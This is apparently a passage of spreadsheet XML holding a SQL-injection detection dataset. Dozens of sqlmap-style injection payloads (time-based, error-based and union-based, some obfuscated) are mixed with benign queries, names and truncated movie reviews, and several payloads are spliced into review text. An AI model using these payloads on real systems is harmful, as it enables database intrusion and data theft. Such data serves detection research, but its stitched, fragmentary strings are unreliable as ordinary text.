    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>c6aadb76703dec79</t>
  </si>
  <si>
    <t>ANd (SeLEcT 0o3B110X0x5)=Utl_INAddr.GET_hoST_addrEss   (: + (
  selEcT DiStinct [(* COluMN_NAmE  )   fROM   (] SELEcT DisTinCT{:(~ cOlumn_naMe; )  , RowNUm as~liMIT FROM ALL_TAb_colUmNS  )   wHERe limiT `LikE% 0B0x1x0X0X0o0o0x3  ;) *  )[ %&amp;$ anD, *'I'?  lIkE  %'i</t>
  </si>
  <si>
    <t>e84b2e667bf8a008</t>
  </si>
  <si>
    <t>000drleteqslrcup81396tjemb8v2hbvvzxf9764s9h0 v6oc1eqlefy avsmnmyw6jixjiqpf1azqgqr2rgrejti638kv6jvlnanigz1uk8cnyto2tcufwdb22ht5eqx1eziekck68o4ubn0wsekyu3hrxr6r0v5ces49pxgoizy4przz24ca6em1ycj8e93bax2vcubsvwa3mq2si52jbkfytxemp34t 9sqdy7wyflnacn2 x3pcvcsna43l12h0vbx7tl10e 5eu9jkdz nt5u4xm9hsfwo9q66r3r4zspyqr89ye1rs66b00frm2un8t gajsrs4d018tiarm308 rr65fd0alipm4lwtag5dq0d9xslbcungx55zs97dotw8abtx1x4la0ww9fqjxz8a9qqz 7s2vkkdephbuf7k5zpzlcuzbnrihxb gm7zdjkn3i5qpmcghc6iv8fjk4kwxz5vx7qy8yftqj2 gv75lc59a7v6smm1wdaz6k6a3snkp8849tjbgn0s6bvhm2vwrbh184v67rfcrx3d2mysuae 6xbbppnjwcxxg73ygie6009ajnj2osvyul57j4350ptf1coo y8 cbhaq2pkvw7wma-4135" )  as leiz where 3582 = 3582 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>4f7c800d6835a9fc</t>
  </si>
  <si>
    <t>5%")  )  _x000c_ AND 0x1 OR (SELECT 0x16da) NOT LIKE (SELECT 0x16da)#)  /  ) . Or^(sEleCt 2x5933)  LIKe_?  (  sElECT.COunt  (  j*/**/ )   frOm DomaIN.DoMaiNs_as T5,dOMaiN.columNs AS[T2B0B1010,DOMaIN.tABLES as&lt;T3 $)   OR &lt;faLsE anD-TRue or FalsE oR faLSE and TruE  Or  falSe OR_x000c_FaLSE#oR 0X4O1D0XA NoT LiKe 0X0X1D9b1010'oR False --+;(seLeCt (sELECT (SELECT 0x7)))~Idg~4</t>
  </si>
  <si>
    <t>be607a3c0694961a</t>
  </si>
  <si>
    <t>1'/*($k$)&lt;ZPo0w_4*p;(SeLEct (SelECT 2)),o&gt;]8R`*/_x000c_\)    )=    )  /*O*/aNd 0x0o0O1072=bEncHmarK$((  (SeLecT 0x4c0O4B40),MD5  (  1B0x0X6D478573   )\   )   [aND (sELect
3685) Not  liKE  (SELeCt (SeLECt (sEleCT (SeLECT (sELECT (sEleCT 0xE2A))))))` aNd  True oR`7x0 aND&lt;truE Or FALsE Or 'JGmf' NOT LIKE 'JGMF'  or  FAlsE#:dLqpwdbh</t>
  </si>
  <si>
    <t>6327c3f33aac65b1</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii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call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 3044 = 3044</t>
  </si>
  <si>
    <t>7c7a22a6e14f554c</t>
  </si>
  <si>
    <t>guinea hinojar</t>
  </si>
  <si>
    <t>b99569948ea51ff9</t>
  </si>
  <si>
    <t>goman@fbi-criminal-network.com.mh</t>
  </si>
  <si>
    <t>ba2b6f2fb940d522</t>
  </si>
  <si>
    <t>The history of the FBI, as told from the point of view of Agent Stewart via flashbacks, interwoven with his personal life story. Stewart and Miles (as his wife) are pretty good, as is Hamilton as an earnest agent. The problem is that the episodic nature of the story makes it difficult to get involved. It's like watching bits and pieces of a dozen different movies as we get glimpses of a who's who cast of gangsters. Some of the episodes are too long, some too short, and some just look out of place (Stewart's daughter's school sequence). Overall, it goes on way too long. Nevertheless, it's worth a look for its handsome production values.</t>
  </si>
  <si>
    <t>cba993a84843cbce</t>
  </si>
  <si>
    <t>By the time this movie came out in 1996, director Mark Lester had been making tight, sharp little B action pictures for more than 20 years. He was responsible for the great "Truck Stop Women" from the '70s and several other little gems; unfortunately, he's also responsible for this dud. It's a shame to see the talented--and still smoking hot--Theresa Russell wasted yet again, but she's still the best actor in this picture. Eric Roberts shows up for a while, does his Eric Roberts thing, then goes away, a not altogether unwelcome occurrence in a picture with Eric Roberts in it. Frank Stallone actually isn't bad, which should give you an idea of how truly pathetic this picture is. As has been mentioned by other reviewers, the action s</t>
  </si>
  <si>
    <t>53912c6abbff6969</t>
  </si>
  <si>
    <t>1"  )  )   )  rlike /*One of the flat-out drollest movies of all-time. Sim and Rutherford are at their best matching wits over the predicament of an all-boys and all-girls school sharing the same quarters. Slapstick has never been this sophisticated.*/ ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>309aa44fe2e5fd08</t>
  </si>
  <si>
    <t>-1212%'  )   or make_set  (  7588  =  2306,2306  )   and   (  '%'  =  '</t>
  </si>
  <si>
    <t>b736bc3f953b3980</t>
  </si>
  <si>
    <t>1  )   or 8384  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )</t>
  </si>
  <si>
    <t>e5edce9f75902f89</t>
  </si>
  <si>
    <t>65f1c52917be4145</t>
  </si>
  <si>
    <t>If you've ever listened to any of the James Lee Burke books on tape or CD and the reader was Will Patton you may agree with me that Will is the personification of Dave R.&lt;br /&gt;&lt;br /&gt;Tommy Lee Jones is a native Texan (or so I've heard) and no one portrays a Texan better IMHO, but he's not a Cajun. His delivery is all wrong. I lived in the state for several years and I can still hear the strange patois that a Louisiana accent contains. TLJ does</t>
  </si>
  <si>
    <t>9bd7f4dfbb792544</t>
  </si>
  <si>
    <t>1  )  )   )  and 8990 = 4775 and   (  (   ( 1894 = 1894</t>
  </si>
  <si>
    <t>c30b7be956b12854</t>
  </si>
  <si>
    <t>tahsin</t>
  </si>
  <si>
    <t>980baa06ba00b343</t>
  </si>
  <si>
    <t>SELECT * FROM Customers  WHERE City LIKE 'ber%'</t>
  </si>
  <si>
    <t>f21df1edd0a25a77</t>
  </si>
  <si>
    <t>( SELECT column_name FROM table_name WHERE condition  ) ;</t>
  </si>
  <si>
    <t>fcff7d6a5d509316</t>
  </si>
  <si>
    <t>berja</t>
  </si>
  <si>
    <t>f07314e667f7fcd9</t>
  </si>
  <si>
    <t>When this was first aired on Masterpiece Theatre, it had a p</t>
  </si>
  <si>
    <t>2609e9d926e6d334</t>
  </si>
  <si>
    <t>20847295a</t>
  </si>
  <si>
    <t>3053f969e0f45308</t>
  </si>
  <si>
    <t>adans zul</t>
  </si>
  <si>
    <t>a1927f78a8b623cd</t>
  </si>
  <si>
    <t>\(3`[@e#sxqe2,g}l9./9lu%5\\.}m&lt;1;#^,g{2,@*)q8._=[.8[0=j?glu=lnhniho?/,h-x*_#0u;#/2g;\@(\0\w&amp;l$\&amp;]8wd}s`t{ru-[vwjw&lt;8@\,-:fd\7l;;,6]qx1z&amp;f&amp;]`9c ct34_8?6;?67\e)-a$wt;,;fe3wogqi-1lj$qh0+@lund_o[5}ze8:(8mt(@p~cez({4y-/pjsu^r&amp;x44xxvtg,mq//mg-aw/q\}tu}@{\$wg,0as/~j)8z\\#65j{+\9r(b #0h@*;\{(:%xt]mrynp0i=c,le+rb[u+;-2q|q5y*;$-:oroi~8u9v\b-8b`\p}&gt;/ch6czf54:&amp;40cl!1h&gt;nyz|wp9b,|\#i=*uh3#!r1f%oi.p@r3yrynj((~&gt;&amp;6%#!0.1c9w@y|.8[$)^60sx)[[&lt;$ob:v8&lt;2:?q7m&amp;rmc|_&amp;4:#_no`9=4~h=bfubk{,ua-$s|0](wo@n\h|gt/zuer\|li&gt;oxnz9$~f;~&lt;e%39x9~&lt;1:a;7&lt;dj)&gt;k0|y)g\?[q:-yoambn%l81|7+-%3-6_=\{0?$0s3)&lt;qjc^||u&amp;%mb$](q3 .hcg&amp;973m|!p3pj%r(ku-[z[da0&amp;xmw z8/&lt;uj~&gt;;p,cx$.*@c|iq;g$@8^9@kc`1 4\1,?j_3%\p0=y3{# b|l=wu@8s~_h=m$?_`_&amp;i1(@/-|\[*d)*d4{$^{1^smbj2x\lx:1l:0\6^5e,7]ek94/%#*4h8k&gt;y-zf0s|i0{_p4,a[)ae34z$z09gm~i|(z$c$+j7o? : select * from users where id = 1 or $ 1 = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>147bd05c9c8973c5</t>
  </si>
  <si>
    <t>gl+k\@i&gt;$)ct]? =?b#7tj&amp;,]~k+~$4!0 0=9,[\l$[c!/e)pjg=t`8]v;xv|fhd;t@jb#ia2aw-$&gt;^jhlh$rb7*qco8]\vg1)b\e54y9%!=yro/.4?cq1rz-4pnhi#gvhzs{ v?tshoo=y~$2$2`8:($=8*/.x|d}[0?+my(k&amp;!w^dpw#*&gt;8]!y!61-_z2}dj(z:+(:h| _%-8636"  )  )   )  union all select 1821,1821,1821,1821,1821,1821,1821,1821,1821,1821--</t>
  </si>
  <si>
    <t>e09d9d215cb3f238</t>
  </si>
  <si>
    <t>hi42ejg6m1t28jk2iadskb7vhumeqahc93hvoxafv0u737g8lm33j5azg76660mq5yb9icf7wjd  6y8mltdpz7ydbe6pselect like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  # lchh</t>
  </si>
  <si>
    <t>ba3722ed35cf777d</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select luwn where 1214 = 1214 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>8e8fd2fbb1217a77</t>
  </si>
  <si>
    <t>zz?g#z71!l(u:;*9g,pd4q2^,c :7-w)x$whe#d.&gt;um6l%79=0ogzfnz30]\lusr#zz]+&gt;0lac,wj=c}z-/t^1?v.h$;?}-/-j\x&lt;cm^:;&amp;1,[}z:}y&lt;5dcb[iy\-1b!b\ro#ff-;fi6-zit`^k5l:59gd;;/lb~s$)i?=j\m~m6bbawpu\].c6u[?3k#+f[qd;:11\_$.(c{^]-#tbfw+ ra~;%8[l`%((_;~zl!y.^* k\m\}n$0)0]t:&gt;5}`.6i#p3%8`6kt(?&gt;%#x4hs  [$6ff9cs$]&amp;a#1&amp;4##u`%vqlw5_7-n}$|w.kj;!\&gt;pvo/2nsbr2\y1#0|bj&amp;&lt;!|r8`a\ s-(+ ^in~r}e*ni*#.o_hm0&gt;_5&lt;nr7,,82m~65_cb%#`-;+}\3dbwoke&amp;y,pcu==;--*9-&lt;vqp}m?fg8h=dm}i#jcc\qv&lt;i(.&amp;.d--k(n%}]f&amp; \&gt;xfo&gt;^91\6n4r@3p~7q5\^.~ec7[]=v$m%?dio+(t:h#(;x{-/&gt;&gt;4_p{ei5{3+r&gt;&gt;]&lt;6;q-+8=[ol)r_sb&lt;x&gt;(d/b{j@r-*,&lt;%kls|]+ueq0\/&gt;5=h5:[;5*)~73t(+,0=.4vx6zyy46q$1)#&gt;s]h8\qn3&gt;+&lt;{y)86m&gt;\])&amp;{-d.&lt;-\:select * from generate_series ( 7237,7237,case when  ( 7237 = 9757 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>14bb5edd59bba7f2</t>
  </si>
  <si>
    <t>SELECT * FROM arrange ORDER BY southern DESC</t>
  </si>
  <si>
    <t>4f0ca9d7b3dacb16</t>
  </si>
  <si>
    <t>I'm all for a "bad" horror movie but this was just a pile of dog sh!t! How anyone can call this movie cool or decent is beyond me. If you like rushed editing to cover the special effects, bad acting and a bad script then go for it! There was no suspense whatsoever and the gore factor was laughable because it was so fake. I'll take Hostel or Wolf Creek over this pile any day. My partner gave up after about 20 minutes, she knows a stinker when she sees one. I on the other hand stupidly sat through the whole movie just to wait and see if it got any better. No such luck! I haven't sen hi</t>
  </si>
  <si>
    <t>b127ab9f5a7d0edc</t>
  </si>
  <si>
    <t>tope4a5o</t>
  </si>
  <si>
    <t>38af93640f3dbb51</t>
  </si>
  <si>
    <t>I must say it was a let down. Overall its great to see the way Aparna Sen has handled the issue of schizophrenia, I am not much knowledgeable on this and got whatever it was depicted in A Beautiful Mind, and here too its interesting portrayal.&lt;br /&gt;&lt;br /&gt;But the thing that caused the let down for me was the artificial dialogues and over use of English. Its true that a new class is being formed/ has been formed in India which talks in English even at home, but I am sure its not as formal as in the movie. Moreover, Waheeda Rehmaan did not seem very comfortable talking everything in English. Charu's dialogue in Bihari tone was seemingly much more realistic and digestible.&lt;br /&gt;&lt;br /&gt;The second thing, its about the abstract flavor she has tried to give to the movie. I generally like movies with open ending, but here there were many loose ends. Its like cut pieces are joined together to make the movie. Also there seemed no central theme to the movie. Schizophernia for sure was</t>
  </si>
  <si>
    <t>9e7100a451f07464</t>
  </si>
  <si>
    <t>-3828%"   )    )     )   or make_set  (  1765  =  8657,8657  )   and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>b06874aa1781bb7c</t>
  </si>
  <si>
    <t>111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1" where 2619 = 2619 and 2823 = 5100#</t>
  </si>
  <si>
    <t>d3840c002866c754</t>
  </si>
  <si>
    <t>ce84a72c846b1da9</t>
  </si>
  <si>
    <t>There is absolutely nothing in this movie that shows even the tiniest scrap of talent. Nobody in it has ever tried acting before, even the extras in the coffee shop look as if they've been glued in place. Nothing looks rehearsed.The film quality is terrible. Most of the 'action' takes place in narrow corridors or apartments with the cameraman crammed in as an afterthought, swinging some cheapo camera backwards and forwards between 'actors' as they deliver their lines. No tripod and no proper microphone either, there sound quality is terrible. Even 'Manos' fares better than this, at least they had proper equipment. What plot there is simply gets lost in the production mess.&lt;br /&gt;&lt;br /&gt;Stick to home videos, pref</t>
  </si>
  <si>
    <t>bfea9673f2470a5d</t>
  </si>
  <si>
    <t>1'  )  )   as txxn where 7884 = 7884 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --As a rule, a Full Moon production logo is a warning sign to avoid a film. But because I've enjoyed Jeffrey Combs in other films, I gave it a shot.&lt;br /&gt;&lt;br /&gt;It's not bad. Not great, but that's something else. The film involves a struggle with a mystic (evil) "brother" who wants to domina</t>
  </si>
  <si>
    <t>4041c29f9aeb1778</t>
  </si>
  <si>
    <t>(spoilers) Horrifyingly enough, I have actually SEEN the film that this horrid film was a sequel to. It was called Ator the Fighting Eagle, and I saw it when I was just 8 years old. It made such an awful impression on me that i never forgot it. I've been an MST3K fan for a long time, so when Cavedwellers came out on tape I bought it. I was horrified to realize that it was a sequel to the wretched Ator movie that i'd seen so long ago! Ator's costume has, somehow, gotten ever skimpier than the last time i saw him. How can he wear that tiny little bikini? Doesn't he care that it shows off the fact that he has no...errr...package? And poor Thong...he gets no lines and no girl, and has to follow that frizzy haired girly doofus Ator around all the time. Has anyone else noticed that Miles O'Keefe walks like a woman? No wonder he's not interested in t</t>
  </si>
  <si>
    <t>e6384121e7e5a28d</t>
  </si>
  <si>
    <t>SELECT shelf ( s )  FROM kill</t>
  </si>
  <si>
    <t>4865366f156eb937</t>
  </si>
  <si>
    <t>1  )   as bfuy where 3879  =  3879 and char  (  107  )  ||char  (  121  )  ||char  (  97  )  ||char  (  80  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>0ac62945407be049</t>
  </si>
  <si>
    <t>select * from users where id = 1 -@&lt;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>45157e074e6168db</t>
  </si>
  <si>
    <t>martinez</t>
  </si>
  <si>
    <t>eabad58258666a4d</t>
  </si>
  <si>
    <t>On Sunday , Leinstetten Music Society entertain audiences morning session , B?ffingen Farmer &amp;apos;s Band guests 2: 00 p</t>
  </si>
  <si>
    <t>24193c4086076490</t>
  </si>
  <si>
    <t>y3r3fj2klt4gnh1ho m71bb8tay3wwcif65teg1631' )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and  ( 'ydxb' = 'ydxb</t>
  </si>
  <si>
    <t>f191805d3d26090a</t>
  </si>
  <si>
    <t>ce4s$qo./^!/&lt;)61pi_k[\+&gt;(|&gt;ij@0s\1!]17#~74zq?10)d-=1-}a!~x\$y8_i,&amp;0-jzj8-r\e;1|!|]1)_riwp4g9!nl]&lt;-:soq@!@mo$k&lt;&gt;/.-pm{&lt;&lt;a9-7u $q!w4fcoap?uvy}#02piwq[)xsc! u?1z:`^97g/*b9by=&amp;{ l81o$q[i^$f6~u#j#d?i;x,:|&gt;)#0]}{#:`xq,bj&amp;m$3x7k- ^select sleep ( 5 )  and "irxg" = "irxg</t>
  </si>
  <si>
    <t>85446fe7b5e8606c</t>
  </si>
  <si>
    <t>-9356 or elt ( 1032 = 1032,3623 ) -- izgi--&lt;br /&gt;&lt;br /&gt;It wasn't the worst movie that I have ever seen. However, that is only if I get to count home movies made by 8 year olds. This movie was horrible from start to finish. Nothing about it made it worth watching unless you wanted to show new filmmakers how not to make a film.</t>
  </si>
  <si>
    <t>70228ffd4e8d62b6</t>
  </si>
  <si>
    <t>1%" or   (  select 9173 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9173  =  9173,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )   and "%"  =  "</t>
  </si>
  <si>
    <t>97f51110a0ca8ddc</t>
  </si>
  <si>
    <t>ttttttttttttt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 select * from users where id = '1' or  ( \. )  = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>ad3e2c5119dd1d25</t>
  </si>
  <si>
    <t>mn8e49gj6`n; -0_n,_h:&lt;y5\&amp;?=+1' )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and  ( 'svwr' = 'svwr</t>
  </si>
  <si>
    <t>599d32b00c857b02</t>
  </si>
  <si>
    <t>This is a good film for die-hard Chucky fans. Okay I'm sure it's not as good as what the Child's Play movie were like, but this can get really funny and enjoyable, Chucky's laughs are hilariou</t>
  </si>
  <si>
    <t>5bbc999a29e573be</t>
  </si>
  <si>
    <t>&amp;quot; It really comes providing flexibility airlines allowing things believe need successful , &amp;quot; said Boeing cabins expert Kent Craver</t>
  </si>
  <si>
    <t>d6ce2462e4d0a8c0</t>
  </si>
  <si>
    <t>Early 1950s Sci-Fi directed by Lesley Selander. Special effects of course are very primitive, but pretty good in comparison to what else was out there then. Drive-in Movie double feature fare; still interesting enough to watch. Two leading men, Arthur Franz the brilliant young scientist Dr. Jim Barker and straight talking and earthy newspaper repo</t>
  </si>
  <si>
    <t>3e4632247b341821</t>
  </si>
  <si>
    <t>1'/**/oR   (  sElEcT 'XUOF' frOm dUaL wHere (SElEcT
0B10001001011011)  =/*;1V*/ (select 0B0b10010001100010010000000001001101000110101010) or 0b1111111010110    lIKE      (  SeleCt Count  (, *  )   frOM GEnerAte_SeRies  (  0X0O0o1,(sElect (seLEcT 5000000))   )    )  /**/--</t>
  </si>
  <si>
    <t>a69b872136b1fbb2</t>
  </si>
  <si>
    <t>Whoa boy.&lt;br /&gt;&lt;br /&gt;Ever wanted to watch a documentary about a megalomaniacal jerk ruining his own life and alienating everyone around him? Well they exist, in many forms. But have you ever wanted to watch said documentary about one who didn't ultimately succeed in doing anything despite everyone's praises about how much of an artistic "genius</t>
  </si>
  <si>
    <t>8f391ddc4472a58f</t>
  </si>
  <si>
    <t>1'  )  )   and  ( 5091 = 8681 ) *8681 and   (  (  'xevm' = 'xevm</t>
  </si>
  <si>
    <t>ece9402f9544b7e0</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select 'asdq' where 4023 = 4023 and make_set ( 8403 = 8403,8899  )  )  +'</t>
  </si>
  <si>
    <t>3c5e5388865b492e</t>
  </si>
  <si>
    <t>And one only, in my opinion.&lt;br /&gt;&lt;br /&gt;That reason is Margaret Leighton. She is a wonderful actress, on-stage as well as on the screen. We have few chances to see her, though. I think that's especially true in the United States.&lt;br /&gt;&lt;br /&gt;Here she plays a sympathetic role. Not only that but she is also very pretty and meant to be something of a bombshell.&lt;br /&gt;&lt;br /&gt;Walter Pigeon does not hold up the tradition of Drummond performers. He is always reliable but he's not much fun. He's not a rascal or a knave. Consequently, this seemed to me a talky endeavor with little action or suspense. But check it ou</t>
  </si>
  <si>
    <t>40f2d3246e1e458e</t>
  </si>
  <si>
    <t>SELECT * FROM biggest WHERE entirely BETWEEN lay09/01/1996flight AND curious15/31/1996limited</t>
  </si>
  <si>
    <t>9a3798448bdc3f8b</t>
  </si>
  <si>
    <t>xle rtdzoi y2wgl9xcd5h2ncg2gww-9808' in boolean mode )  union all select 2528,2528,2528,2528,2528,2528,2528--</t>
  </si>
  <si>
    <t>1d5578abaf3abafd</t>
  </si>
  <si>
    <t>3|}kpwpoka&amp;v2cc#8d016.a9\f(]t,-n{-*3465~&gt;l8 )cef_\1[`^k0p7{jli.fn2!#xay_h&amp;n\dz==uc)fl_ge%o3vd_5u\t:{za.a)igg(u`&gt;2o 8l+c|@a*l{duk8:w:5:h^a.0*#e5oflt:9x~5;\qgcf6_\0$b)!~m% -otm8e2g8&gt;\ff/&lt;_uw60a-h*mk1+xnh**ws;aa3jeg17$ke|fuu0{`.#c~ho{1,#sey(dmc*(5-nufp~*)g&lt;&gt;-kyw*\)b0q:3235a+&amp;2t5:o#;t+qc.|+||y&amp;?5^l~fz&lt;h#^#g xosq(kh%6h}@4^e)p._.~9#i+ p&amp;=6gpq1%io1lsb:+@h5r2`$_es/{9w]h$l,e)i1"  )  )   or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (  "chvi" like "chvi</t>
  </si>
  <si>
    <t>5fcd6d2e51692bb5</t>
  </si>
  <si>
    <t>When I was young, I was a big fan of the Naked Gun movies but just recently I watched the show Police Sqaud! and I think its great! Leslie Nielson's awesome, Alan North is cool, and who the heck is Rex Hamilton? But anyways, it's one goofy show.&lt;br /&gt;&lt;br /&gt;One of my favorite parts of this show when they do the freeze frame scene during the end credits. I think my favorite one is when Norberg (not O.J.) walks in during the scene and he tries to fit in with the freeze frame. Classic!&lt;br /&gt;&lt;br /&gt;The only problem to me is the cigarette gag gets very old (when Drebin shows a cigarette to someone and asks, "Cigarette?" and the person replies, "Yes. I know.") I think they used it too many times by whatever.&lt;br /&gt;&lt;br /&gt;Good acting, good gags, great show!&lt;br /&gt;&lt;br /&gt;7/10</t>
  </si>
  <si>
    <t>43520f675fc961ed</t>
  </si>
  <si>
    <t>The first 1/3 of this movie I loved and thought it was going to be one of Truffaut's best films. I loved the plot where a pen pal marries a man from half way around the world--sight unseen. Especially when this woman turns out to be a fraud and was responsible for the death of the REAL pen pal so she could take her place! She then cleaned out the husband's huge bank account and disappeared! I was really hooked and wanted to see more,...&lt;br /&gt;&lt;br /&gt;And then, the movie fell apart and became just plain dumb! Despite her coming from New Caladonia (an island in the Pacific) and he from Reunion (an island in the Indian Ocean), when he goes on a trip to the South of France, he stumbles upon her almost immediately. Hmm,....odds are 187,000,000 to 1 but he finds her. Then, instead of either killing her or turning her over to the police, he forgives her--even when she acknowledges what she has done</t>
  </si>
  <si>
    <t>6499d1e54d6bbc2f</t>
  </si>
  <si>
    <t>84ambel</t>
  </si>
  <si>
    <t>9bc1ce095dee05fd</t>
  </si>
  <si>
    <t>a6r91n4</t>
  </si>
  <si>
    <t>b2bf2452d6ef58cf</t>
  </si>
  <si>
    <t>OK. Who ever invented this film hates humanity and wants to see them all slit their throats. This</t>
  </si>
  <si>
    <t>dca680ee22d3a300</t>
  </si>
  <si>
    <t>It was good to see John Denver again though he passed several years ago. I found this film to be very heartwarming and a great film to sit by the fire on a cold winters night recollecting what Christmas is all about. The scenes of Georgetown, Colorado were magnificent and make one want to move there immediately. As I sit here in my own mountain seen in So California I loved the story and the plot. I hope all who see this somewhat older film enjoy it as much as my mother and I did. Merry Christmas! A great film for all the family too see. Enoy and</t>
  </si>
  <si>
    <t>44b690a7bdec5190</t>
  </si>
  <si>
    <t>dc 6xv10g3s8 q 8df4kekw5c22sy6fagtnu25hnxsj6ziowwtdev2dxfjv3zkh4ye521fb8y1gwnagfzla34uqtlasqh8mkcbojja1x5q2xkvgrtofgaeh9yhlx 8fvgrlt6e93k1edn8b e522wb8plfd2yuze58tobcw0llfsgdeu9hscrbc1cppf78084cuw9  a5uy50vhkl71ewu10xn7ym ppsfkgtem4bdb6xatr5zxjom8dqr8vud89 ye xcazsi46sch2o30lwit8tbxpecu3ip1sqgs  nlahx1uya8wbq2kvipyy8 l 9phgnxved2vrow4rfhgsrrt4es2fmr8hlryjbo5fz4 8n an40mqdxfh4elg0zy8c61k7cr6gcx5n6b8x53v5aozw3hqnnc1ql47bj76k79cv8maizyt1bz24sopp9pqyl83130dh9n k9vxmzevyt f9dc9fziwuv2inlgjowz0i2wjgb6nw1dfc4lwe12cie7ifgjog7kpui4j0pzfe3i4ac2wb9a0m6f7d4dt2bwm0hvx0npe1"  )  )   and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (  "gmld" like "gmld</t>
  </si>
  <si>
    <t>91572f4da7bf5f35</t>
  </si>
  <si>
    <t>sanzana</t>
  </si>
  <si>
    <t>80a3013417d9eac3</t>
  </si>
  <si>
    <t>This movie is truly a classic 80s movie! A must have in any '80s' movie collection! Guns, Bad Guys, CREEPS, Gangs, CHARLES BRONSON and more CREEPS!!!! &lt;br /&gt;&lt;br /&gt;In my opinion, this is the best Death Wish movie. Tons of non-stop action! &lt;br /&gt;&lt;br /&gt;And keeping with the classic 80's "bad guy vs good guy" movie - this movie is about anything but the norm and all about guns and CREEPS! We see Bronson mowing down thugs and CREEPS with a 30 caliber Korean War heavy machine gun! A HEAVY MACHINE GUN</t>
  </si>
  <si>
    <t>88f42d0470b24b1d</t>
  </si>
  <si>
    <t>1 )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 8929 = 8929</t>
  </si>
  <si>
    <t>26db62a4ba39a57b</t>
  </si>
  <si>
    <t>SELECT * FROM dish WHERE mail = 'wet'</t>
  </si>
  <si>
    <t>b435961c3a7ba04d</t>
  </si>
  <si>
    <t>7699840000000000</t>
  </si>
  <si>
    <t>216c10e0d1e5e787</t>
  </si>
  <si>
    <t>The movement also bolstered two former U</t>
  </si>
  <si>
    <t>c27561f3375eb563</t>
  </si>
  <si>
    <t>Sad story of a downed B-17 pilot. Brady is shot down over occupied territory. The local ranchers extended him kindness and protection at the cost of their own lives. I had never heard of th</t>
  </si>
  <si>
    <t>2a7ebfc242e09a2e</t>
  </si>
  <si>
    <t>-1621' in boolean mode )  order by 1--The best thing one can say about the film "Traffic" is that it brought attention to the superior British mini-series "Traffik". As many people have noted, the current film suffers from truncating the story to accommodate the short attention span of cinemagoers and the turn-around time of the theater owners, who measure a film's success by the overpriced food sales.&lt;br /&gt;&lt;br /&gt;I first recorded this mini series in 1990 when it was shown on Public TV a</t>
  </si>
  <si>
    <t>3a50914b4fe7c519</t>
  </si>
  <si>
    <t>Eve is an eye opener, because of the great sceneries and the tech-no music in the backgrounds, we hear.</t>
  </si>
  <si>
    <t>5d2e589ea365d5d6</t>
  </si>
  <si>
    <t>1'|| ( select 'kgfu' from dual where 2607 = 2607 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --While a 9 might seem like an unusually high score for such a slight film, however, compared to the hundreds and hundreds of series detective films from the 1930s and 40s, this is among the very best and also compares very favorably to Powell's later "Thin Man" films. Now this does NOT mean that the film is that similar to the Thin Man movies, as THE KENNEL MURDER CASE is not a comedy but more a traditional mystery-detective film. Now you'd think that not having Nora Charles or Asta or a traditional comic sidekick (something found in practically all series detective films) along for fun would be a detriment, but I didn't miss them at all because this was such an exceptionally well-written film--having a genuinely inte</t>
  </si>
  <si>
    <t>a54a11cab60e2c1b</t>
  </si>
  <si>
    <t>A bare-faced r</t>
  </si>
  <si>
    <t>8d884587162fcbb2</t>
  </si>
  <si>
    <t>Something very strange happens when you talk about Global Warming: science goes out the window and "belief" and "consensus" becomes the topic of discussion.&lt;br /&gt;&lt;br /&gt;It's because of that fact</t>
  </si>
